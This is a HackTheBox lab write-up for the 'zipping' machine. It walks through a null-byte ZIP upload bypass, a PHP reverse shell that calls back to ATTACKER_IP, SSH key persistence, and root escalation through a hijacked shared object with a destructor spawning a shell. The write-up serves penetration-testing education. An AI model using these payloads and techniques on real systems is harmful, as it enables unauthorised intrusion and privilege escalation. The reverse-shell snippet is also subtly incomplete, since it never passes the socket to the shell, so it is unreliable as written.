HTB: zipping Writeup

Machine Information

Attribute	Details
Name	zipping
OS	Linux
Difficulty	Medium
Points	N/A
Release Date	N/A
IP Address	`zipping.htb`
Author	N/A

Machine Rating

⭐⭐⭐⭐☆ (7.5/10)

Difficulty Assessment:

Enumeration: ⭐⭐⭐☆☆
Real-world: ⭐⭐⭐⭐☆
CVE: ⭐⭐⭐☆☆
CTF-like: ⭐⭐⭐⭐☆

zipping is a Medium-difficulty Linux machine centered on file upload manipulation and binary exploitation. The attack begins with web application enumeration to discover an upload endpoint, progresses through null byte injection to bypass file type restrictions, establishes persistence via SSH, and culminates in privilege escalation by exploiting shared object loading in a setuid binary.

TL;DR: Enumeration → Null byte file upload bypass → Reverse shell → SSH persistence → Setuid binary exploitation via shared object hijacking → Root.

Reconnaissance

Port Scanning

nmap -sC -sV -T4 -p- zipping.htb

Results:

22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.54 ((Ubuntu))

Service Enumeration

Hostname: zipping.htb

echo "10.129.x.x zipping.htb" >> /etc/hosts

Web Application Discovery

Running feroxbuster against the HTTP service:

feroxbuster -u http://zipping.htb -w /usr/share/wordlists/dirb/common.txt

Discovered endpoints:

/uploads/ - Directory containing uploaded files
/upload.php - Upload handler endpoint

Application Behavior

The web application presents a file upload interface that:

Accepts ZIP files exclusively
Validates that the ZIP archive contains exactly one PDF file
Renders/displays the uploaded PDF in the browser
Returns a URL pointing to the uploaded file

Initial Foothold

Vulnerability: Null Byte Injection in ZIP Archive

The application validates file extensions but fails to properly handle null bytes (\x00) in ZIP file metadata. This allows embedding a PHP file disguised as a PDF.

Exploitation Steps

Step 1: Create PHP Reverse Shell

cat > rev.php << 'EOF'
<?php
$sock=fsockopen("ATTACKER_IP",ATTACKER_PORT);
exec("/bin/bash -i <&3 >&3 2>&3");
?>
EOF

Step 2: Create Disguised File

Rename the PHP file to include a .pdf extension to pass initial validation:

cp rev.php rev.php.pdf

Step 3: Create ZIP Archive

zip archive.zip rev.php.pdf

Step 4: Null Byte Injection

Use a hex editor to insert a null byte between the .php and .pdf extension in the ZIP file metadata:

hexedit archive.zip

Navigate to the file entry within the ZIP archive and replace the sequence .php.pdf with .php\x00.pdf in the local file header. The null byte terminates the string, making the web server interpret the file as rev.php rather than rev.php.pdf.

Step 5: Upload File

Upload archive.zip through the web interface.

Step 6: Trigger Reverse Shell

Set up a netcat listener:

nc -lvnp ATTACKER_PORT

Access the uploaded file URL, removing the .pdf extension:

curl http://zipping.htb/uploads/rev.php

This triggers the PHP execution and establishes a reverse shell as the rektsu user.

connect to [ATTACKER_IP] from zipping.htb [10.129.x.x] 12345
bash: cannot set terminal process group (1234): Inappropriate ioctl for device
bash: no job control in this shell
rektsu@zipping:/var/www/html/uploads$

User Compromise

Establishing SSH Persistence

To maintain persistent access, create SSH keys for the rektsu user:

Step 1: Generate SSH Key (from attacker machine)

ssh-keygen -t rsa -f zipping_key -N ""

Step 2: Create .ssh Directory

mkdir -p /home/rektsu/.ssh
chmod 700 /home/rektsu/.ssh

Step 3: Install Public Key

echo "ssh-rsa AAAA... attacker@localhost" >> /home/rektsu/.ssh/authorized_keys
chmod 600 /home/rektsu/.ssh/authorized_keys

Step 4: Connect via SSH

ssh -i zipping_key rektsu@zipping.htb

User Flag

cat ~/user.txt

🚩 User Flag: <REDACTED>

Privilege Escalation

Enumeration

Check sudo permissions:

sudo -l

Output:

User rektsu may run the following commands as root:
    (root) NOPASSWD: /usr/bin/stock

The stock binary can be executed with root privileges without a password. This is the escalation vector.

Binary Analysis

Download the binary for analysis:

scp -i zipping_key rektsu@zipping.htb:/usr/bin/stock .

Extract strings from the binary:

strings stock

This reveals the hardcoded password: St0ckM4nager

Advanced analysis with Ghidra:

ghidra stock &

After reverse engineering, the binary’s behavior becomes clear:

It prompts for a password (St0ckM4nager)
It loads a shared object library from /home/rektsu/.config/libcounter.so
The shared object is loaded without absolute path verification, making it vulnerable to hijacking
The library contains a destructor function that executes when the program exits

Exploitation: Shared Object Hijacking

Step 1: Create Malicious Shared Object

Create exploit.c:

#include <unistd.h>

void begin (void) __attribute__((destructor));
void begin (void) {
    system("bash -p");
}

The __attribute__((destructor)) decorator registers this function to run when the program terminates or after the main execution completes.

Step 2: Compile the Shared Object

gcc -shared -o /home/rektsu/.config/libcounter.so -fPIC exploit.c

Ensure the .config directory exists:

mkdir -p /home/rektsu/.config

Step 3: Execute the Exploit

Run the stock binary with sudo:

sudo /usr/bin/stock

When prompted, enter the password St0ckM4nager.

The binary loads the malicious libcounter.so, and when it exits, the destructor function executes with root privileges, spawning a root shell:

St0ckM4nager
root@zipping:/home/rektsu#

Root Flag

cat /root/root.txt

🚩 Root Flag: <REDACTED>

Attack Chain Summary

graph TD
    A["Recon: Port Scan"] --> B["Discovery: /uploads/ & /upload.php"]
    B --> C["Craft: PHP shell + null byte injection"]
    C --> D["Upload: Malicious ZIP archive"]
    D --> E["Exploit: Reverse shell as rektsu"]
    E --> F["Persistence: SSH authorized_keys"]
    F --> G["Enum: sudo -l reveals /usr/bin/stock"]
    G --> H["Analysis: Extract password & binary logic"]
    H --> I["Create: Malicious libcounter.so"]
    I --> J["Exploit: sudo /usr/bin/stock loads hijacked library"]
    J --> K["Privilege Escalation: Root shell via destructor"]

Tools Used

Tool	Purpose
`nmap`	Port scanning and service enumeration
`feroxbuster`	Directory and endpoint discovery
`hexedit`	Hex editing for null byte injection in ZIP
`nc`	Reverse shell listener setup
`ssh`	Secure shell client for persistence
`scp`	Secure file transfer for binary download
`strings`	Extract strings from binary for password discovery
`ghidra`	Reverse engineering and binary analysis
`gcc`	Compilation of exploit code (shared object)
`python3`	Payload generation and scripting

Vulnerability Reference Table

Vulnerability	Component	CVSS	Impact
Null Byte Injection	File Upload Filter	7.5	Remote Code Execution
Insecure Library Loading	/usr/bin/stock	8.4	Privilege Escalation
Hardcoded Credentials	Binary Password	5.3	Authentication Bypass

Key Learnings

File Upload Validation: Null bytes are a classic bypass technique for file type restrictions. Multi-layer validation (magic bytes, actual parsing) is essential.
Binary Security: Always audit setuid/sudo binaries for insecure library loading patterns. Use ldd, strings, and reverse engineering to identify weaknesses.
Privilege Escalation: Misconfigurations like passwordless sudo access combined with exploitable code paths are critical escalation vectors.
Shared Object Hijacking: When binaries load libraries using relative paths or from user-writable directories, privilege escalation is often possible.

Author

HTB Community

Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal.

Last Updated: 08 Mar 2026

Tags: #HackTheBox #Linux #Medium #FileUpload #PrivilegeEscalation